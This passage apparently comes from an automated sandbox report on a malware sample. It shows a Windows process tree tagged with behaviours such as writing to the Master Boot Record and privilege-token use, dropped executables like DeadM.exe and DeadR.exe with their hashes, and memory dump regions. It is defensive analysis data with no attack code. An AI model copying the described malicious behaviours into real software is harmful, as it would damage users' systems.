                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:1900
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                    PID:4308
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3764
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3460
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:4820
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:652
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:1020
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:2032
                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                              1⤵
                                                                                                                PID:3144
                                                                                                              • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                C:\Windows\System32\WaaSMedicAgent.exe 04f8cd06a0e696aa303a65a8c474e328 xTzRBVHY0UqjC2JBo7IG1g.0.1.0.0.0
                                                                                                                1⤵
                                                                                                                • Sets service image path in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1800
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  2⤵
                                                                                                                    PID:3428
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3720
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:1164
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:3464
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                  1⤵
                                                                                                                    PID:2600
                                                                                                                  • C:\Windows\System32\mousocoreworker.exe
                                                                                                                    C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:4384

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DeadM.exe.log

                                                                                                                    Filesize

                                                                                                                    654B

                                                                                                                    MD5

                                                                                                                    11c6e74f0561678d2cf7fc075a6cc00c

                                                                                                                    SHA1

                                                                                                                    535ee79ba978554abcb98c566235805e7ea18490

                                                                                                                    SHA256

                                                                                                                    d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

                                                                                                                    SHA512

                                                                                                                    32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe

                                                                                                                    Filesize

                                                                                                                    35KB

                                                                                                                    MD5

                                                                                                                    a511516966279868f29c49bba981673b

                                                                                                                    SHA1

                                                                                                                    d6e9d37f297da33fc7ae15950e8ccd8e5a2b4792

                                                                                                                    SHA256

                                                                                                                    ac0ca438e575070c22819b08c8048316c722eee872525ece4f724745dee7b8aa

                                                                                                                    SHA512

                                                                                                                    2712fac1d5972b9aebe97fdaad045b92a30798f1b86eb0f33d63f51abc2f2703237f32d08d6a941b720822b2151e152e437a9294f6017365682dd0d03c5a11bb

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DeadR.exe

                                                                                                                    Filesize

                                                                                                                    151KB

                                                                                                                    MD5

                                                                                                                    b8479a23c22cf6fc456e197939284069

                                                                                                                    SHA1

                                                                                                                    b2d98cc291f16192a46f363d007e012d45c63300

                                                                                                                    SHA256

                                                                                                                    18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

                                                                                                                    SHA512

                                                                                                                    786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                    SHA1

                                                                                                                    f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                    SHA256

                                                                                                                    7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                    SHA512

                                                                                                                    583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                    SHA1

                                                                                                                    1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                    SHA256

                                                                                                                    8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                    SHA512

                                                                                                                    537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_1prnj4py.fgg.ps1

                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    ed30ca9187bf5593affb3dc9276309a6

                                                                                                                    SHA1

                                                                                                                    c63757897a6c43a44102b221fe8dc36355e99359

                                                                                                                    SHA256

                                                                                                                    81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

                                                                                                                    SHA512

                                                                                                                    1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    35d6dc85f8160a917fd1cfc3a0ba8874

                                                                                                                    SHA1

                                                                                                                    fdbb4749a5c098b123cd4f946debd0fb5e4c409e

                                                                                                                    SHA256

                                                                                                                    a165677049585793834a28f030a9414cb0eea85ec94a60a0be400809e43a0374

                                                                                                                    SHA512

                                                                                                                    95a51a8bec50eaeffb8b33727442a52d975b4f6262ebdcf08f8a94e9e1684594bc1cf021e1c1f919445d6e61e5778fe2f6dc7bf5d67d4883ab151cfbab2032c8

                                                                                                                  • memory/404-110-0x00007FFC37E70000-0x00007FFC37E80000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/404-103-0x00000183E8AD0000-0x00000183E8AF7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/404-109-0x00000183E8AD0000-0x00000183E8AF7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/456-114-0x000001A2002E0000-0x000001A200307000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/600-70-0x000002016B250000-0x000002016B277000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/600-68-0x000002016B220000-0x000002016B242000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/600-77-0x00007FFC37E70000-0x00007FFC37E80000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/600-76-0x000002016B250000-0x000002016B277000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/600-69-0x000002016B250000-0x000002016B277000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/680-87-0x000002175C4E0000-0x000002175C507000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/680-81-0x000002175C4E0000-0x000002175C507000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/680-88-0x00007FFC37E70000-0x00007FFC37E80000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/956-55-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/956-62-0x00007FFC75F30000-0x00007FFC75FED000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    756KB

                                                                                                                  • memory/956-65-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/956-56-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/956-58-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/956-61-0x00007FFC77DF0000-0x00007FFC77FE8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/956-60-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/956-57-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/960-98-0x00000231A71D0000-0x00000231A71F7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/960-99-0x00007FFC37E70000-0x00007FFC37E80000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/960-92-0x00000231A71D0000-0x00000231A71F7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/1764-739-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/1764-32-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/3396-1405-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/3396-16-0x0000000000F90000-0x0000000000FA0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/3396-27-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/3396-1504-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/3396-1457-0x00007FFC59A90000-0x00007FFC5A552000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/3864-54-0x00007FFC75F30000-0x00007FFC75FED000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    756KB

                                                                                                                  • memory/3864-53-0x00007FFC77DF0000-0x00007FFC77FE8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/3864-52-0x00000216A0130000-0x00000216A0158000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    160KB

                                                                                                                  • memory/3864-42-0x000002169FDE0000-0x000002169FE02000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/3884-0-0x00007FFC59A93000-0x00007FFC59A95000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/3884-1-0x0000000000740000-0x00000000007C4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    528KB